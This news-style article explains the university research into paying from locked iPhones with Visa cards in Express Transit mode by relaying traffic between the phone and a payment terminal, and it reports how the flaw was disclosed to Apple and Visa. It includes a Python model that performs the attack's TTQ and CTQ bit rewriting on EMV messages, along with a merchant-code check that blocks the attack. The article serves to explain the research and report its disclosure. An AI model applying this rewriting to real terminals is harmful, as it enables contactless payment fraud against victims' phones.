Researchers from the University of Birmingham and the University of Surrey found that a locked iPhone can be made to approve an Apple Pay transaction under certain conditions, namely when a Visa card has been set up for Express Transit.
Because the attack works over the air, it amounts to a digital version of pickpocketing: the iPhone can stay in a bag or a pocket, and the amount is not bounded by any contactless transaction limit.
How Does It Work?
Normally, a payment goes through only after the iPhone user authorizes it by unlocking the phone with Face ID, Touch ID, or a passcode.
That unlock step is inconvenient in some situations, such as tapping through a ticket gate on public transit.
Apple Pay addressed the issue with Express Transit, a feature that allows a transaction to be completed without the device being unlocked.
Express Transit relies on transit card readers that send a non-standard sequence of bytes (the researchers call them the "magic bytes") which tells the iPhone to bypass the Apple Pay lock screen for specialized services such as ticket gates.
This feature can be abused to bypass the Apple Pay lock screen and make a payment from a locked iPhone with a Visa card to any EMV reader, for any amount, without user authorisation.
To demonstrate it, the researchers used a Proxmark device posing as a card reader to talk to the target iPhone, and an Android phone with an NFC chip, posing as the card, to talk to a real payment terminal, so that the terminal sees what looks like a ticket-barrier transaction.
It is an active man-in-the-middle relay attack with a replay component: the Proxmark replays the "magic bytes" to the iPhone so that it believes it is talking to a ticket gate, which removes the requirement for user authentication before the payment is authorized.
Replaying the magic bytes alone is not enough, however. Transit readers often have only intermittent connectivity, so they are allowed to perform Offline Data Authentication (ODA) on transactions that will later be authorized online, and the iPhone expects a reader that announces this capability. The relay therefore has to rewrite two pieces of protocol data as it passes the EMV messages between the terminal and the iPhone.
First, in the terminal-to-phone direction, the Terminal Transaction Qualifiers (TTQ) sent by the EMV terminal are modified so that the bits (flags) for "Offline Data Authentication for Online Authorizations supported" and "EMV mode supported" are set, matching what a transport reader would send.
Second, in the phone-to-terminal direction, the Card Transaction Qualifiers (CTQ) returned by the iPhone are modified so that the flag indicating that cardholder verification was performed on the consumer device is set. The reader then believes the user has authenticated on the phone and does not apply the contactless transaction limit, so a transaction of any amount is accepted.
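The two rewrites described above, and the device-side transit-merchant check that the article later credits with stopping the attack on Mastercard, as an added, self-contained Python model (this is editorial example code, not the researchers' tooling). The TTQ (tag 9F66) and CTQ (tag 9F6C) bit positions follow the public Visa contactless encoding; the GET PROCESSING OPTIONS response, the TTQ value and the transit MCC allow-list are constructed for the example, and the undisclosed "magic bytes" are deliberately not modelled.

```python
"""Model of the TTQ/CTQ bit rewriting performed by the relay, plus a
device-side merchant-category check. Example code, not from the paper."""

# TTQ (tag 9F66), byte 1. EMV numbers bits 8..1, MSB first:
#   bit 6 (0x20) = "EMV mode supported"
#   bit 1 (0x01) = "Offline Data Authentication for Online Authorizations supported"
TTQ_B1_EMV_MODE = 0x20
TTQ_B1_ODA_FOR_ONLINE = 0x01

# CTQ (tag 9F6C), byte 2, bit 8 (0x80) = "Consumer Device CVM performed".
CTQ_B2_CDCVM_PERFORMED = 0x80

# Transit merchant category codes (tag 9F15, BCD) used as an illustrative
# allow-list: 4111 commuter transport, 4112 passenger railways, 4131 bus lines.
TRANSIT_MCCS = {b"\x41\x11", b"\x41\x12", b"\x41\x31"}

# Constructed GPO response (format 2 template 77): AIP, CTQ with no CDCVM
# performed, and an ATC. Offsets are absolute into this byte string.
SAMPLE_GPO_RESPONSE = bytes.fromhex("770E" "82020000" "9F6C020000" "9F3602002A")


def parse_tlv(data: bytes) -> dict:
    """Minimal BER-TLV parser: {tag_hex: (absolute_value_offset, value)}.

    Handles multi-byte tags (9F66, 9F6C), short and long-form lengths, and
    descends into constructed templates such as 77 so nested tags are found.
    """
    out = {}
    i = 0
    while i < len(data):
        tag = data[i:i + 1]
        i += 1
        if tag[0] & 0x1F == 0x1F:          # more tag bytes follow
            while data[i] & 0x80:
                tag += data[i:i + 1]
                i += 1
            tag += data[i:i + 1]
            i += 1
        length = data[i]
        i += 1
        if length & 0x80:                  # long form: low 7 bits = #length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        value = data[i:i + length]
        if tag[0] & 0x20:                  # constructed: recurse, shift offsets
            for t, (off, v) in parse_tlv(value).items():
                out[t] = (i + off, v)
        else:
            out[tag.hex().upper()] = (i, value)
        i += length
    return out


def modify_ttq(ttq: bytes) -> bytes:
    """Terminal -> iPhone direction: make any reader look like a transit gate
    that does ODA for online authorisation in EMV mode."""
    if len(ttq) != 4:
        raise ValueError("TTQ is 4 bytes")
    b = bytearray(ttq)
    b[0] |= TTQ_B1_EMV_MODE | TTQ_B1_ODA_FOR_ONLINE
    return bytes(b)


def modify_ctq(ctq: bytes) -> bytes:
    """iPhone -> terminal direction: claim cardholder verification happened on
    the device, so the terminal applies no contactless limit."""
    if len(ctq) != 2:
        raise ValueError("CTQ is 2 bytes")
    b = bytearray(ctq)
    b[1] |= CTQ_B2_CDCVM_PERFORMED
    return bytes(b)


def relay_gpo_response(response: bytes) -> bytes:
    """Rewrite tag 9F6C inside a GET PROCESSING OPTIONS response in place.
    The length is unchanged, so enclosing template lengths stay valid."""
    objs = parse_tlv(response)
    if "9F6C" not in objs:
        return response                     # nothing to rewrite
    off, ctq = objs["9F6C"]
    return response[:off] + modify_ctq(ctq) + response[off + len(ctq):]


def device_should_accept(locked: bool, mcc: bytes) -> bool:
    """Policy the article attributes to Mastercard: a locked device only
    proceeds if the reader's Merchant Category Code is a transit code."""
    return (not locked) or mcc in TRANSIT_MCCS


if __name__ == "__main__":
    print("TTQ 16004000 ->", modify_ttq(bytes.fromhex("16004000")).hex())
    print("GPO response ->", relay_gpo_response(SAMPLE_GPO_RESPONSE).hex())
    print("locked, MCC 5999 accepted?", device_should_accept(True, b"\x59\x99"))
```

Note the asymmetry the model makes visible: the relay never touches any cryptogram, it only flips capability and status bits that neither side authenticates, which is why a reader-side check on the merchant category (or the distance-bounding protection the paper proposes) has to live outside those bits.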
The Vulnerability Has Not Been Fixed
According to BleepingComputer, the attack worked only with iPhones and Visa cards. When the researchers tried it with Mastercard, a check blocked it: a locked iPhone accepts a Mastercard transaction only from card readers that present a transit merchant code.
The method was also tried with Samsung Pay. Transactions with a locked Samsung device are always possible, but the transaction value is always zero, and transport providers charge for tickets afterwards based on the data associated with these zero-value transactions, so the attack yields nothing of value.
The findings were disclosed to Apple in October 2020 and to Visa in May 2021, but neither company has fixed the issue.
Instead, each has pointed to the other as the party responsible for a fix, so the vulnerability remains unaddressed and exploitable with off-the-shelf hardware and software.
More details are in the paper "Practical EMV Relay Protection" by Andreea-Ina Radu and Tom Chothia (University of Birmingham) and Christopher J.P. Newton, Ioana Boureanu, and Liqun Chen (University of Surrey), to be presented at the 2022 IEEE Symposium on Security and Privacy.